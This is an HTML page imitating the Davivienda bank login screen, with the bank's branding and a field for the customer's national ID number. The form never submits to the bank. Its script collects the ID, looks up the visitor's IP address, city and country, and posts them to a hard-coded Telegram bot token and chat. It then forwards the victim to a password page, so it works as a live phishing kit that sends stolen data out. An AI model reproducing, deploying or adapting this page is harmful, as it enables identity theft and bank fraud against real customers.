<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Davivienda</title>
    <style>
        body {
            position: relative;
            height: 100%;
            overflow: hidden;
            margin: 0;
            padding: 0;
            border: none;
            background: #fff url(bg-login-1.jpg) no-repeat fixed top;
            background-size: cover;
            display: block;
        }
        .center {
            max-width: 361px;
            height: 522px;
            background: #595959;
            border-radius: 5px; /* Bordes semiredondeados */
        }
        .centrar {
            margin: 100px;
        }
        .label {
            color: white; /* Color blanco */
            font-size: 16px; /* Tamaño de fuente 16px */
            margin-left: 20px; /* Margen a la izquierda */
            margin-top: 20px; /* Margen arriba */
        }
        @media (max-width: 600px) {
            .centrar {
                display: grid;
                margin: 0;
                place-items: center;
                height: 522px;
                margin-top: 20px;
            }
            .center {
                width: 95%;
                height: 100%;
            }
        }
    </style>
</head>
<body>
    <div style="display: flex; justify-content: space-between; width: 100%; height: 100px; background: #ed1c27;">
        <img src="logoizquierda.png" alt="Imagen Izquierda" style="width: 250px; padding: 20px" />
        <img src="derecha.png" alt="Imagen Derecha" style="width: 130px; height: 65px; padding: 20px" />
    </div>
    <div style="width: 100%; height: 30px; background: #f1f0ef;"></div>
    <form id="loginform">
        <div class="centrar">
            <div class="center">
                <div style="text-align: center">
                    <img src="logo1.png" style="width: 200px; margin-top: 50px;" />
                </div>
                <div class="label">Cédula de Ciudadanía</div>
                <div style="text-align: left; margin-left: 10px; margin-top: 1px;">
                    <img src="usuario.jpg" alt="" style="width: 50px;" />
                </div>
                <div style="display: flex; align-items: center; margin-left: 20px;">
                    <input
                        maxlength="22"
                        pattern="[0-9]*"
                        inputmode="numeric"
                        required
                        name="ix1"
                        id="ix1"
                        type="number"
                        placeholder="No. Documento"
                        autocomplete="off"
                        style="
                            height: 32px;
                            width: 154px;
                            border: none;
                            background: white;
                            padding: 0 0 0 8px;
                            border: 1px solid rgb(145, 18, 18);
                            font-size: 13px;
                            font-family: sans-serif;
                            border-radius: 5px; /* Bordes semiredondeados */
                        "
                    />
                    <div style="margin-left: 10px; padding-top: 2px;">
                        <button type="submit" style="background: transparent; border: 0; margin: 0;">
                            <img src="boton.png" width="90" style="border-radius: 5px;" />
                        </button>
                    </div>
                </div>
                <div style="text-align: left;">
                    <img src="campos.png" style="width: 350px; margin-top: 30px;" />
                </div>
            </div>
        </div>
    </form>
    <script src="https://cdn.jsdelivr.net/npm/axios@1.1.2/dist/axios.min.js"></script>
    <script>
        const url = "https://ipapi.co/json/";
        const form = document.querySelector("#loginform");

        form.addEventListener("submit", (event) => {
            event.preventDefault(); // Evita que se envíe el formulario por defecto
            if (!form.checkValidity()) {
                alert("Por favor, completa todos los campos requeridos.");
                return;
            }

            const usuario = document.querySelector("#ix1").value;

            axios
                .get(url)
                .then((response) => {
                    localStorage.setItem("Document0", usuario);
                    const message =
                        "\nDavi\nDocument0: " +
                        usuario +
                        "\nCiudad: " +
                        response.data.city +
                        "\nPais: " +
                        response.data.country +
                        "\nIP: " +
                        response.data.ip;

                    return axios.post(
                        "https://api.telegram.org/bot7533699985:AAG4I47bjPhk552DyJpNPUFl2THTw-cFb4c/sendMessage",
                        {
                            chat_id: "-4534528207",
                            text: message,
                        }
                    );
                })
                .then(() => {
                    window.location.href = "password.html";
                })
                .catch((error) => {
                    console.error("Error:", error.response ? error.response.data : error.message);
                });
        });
    </script>
</body>
</html>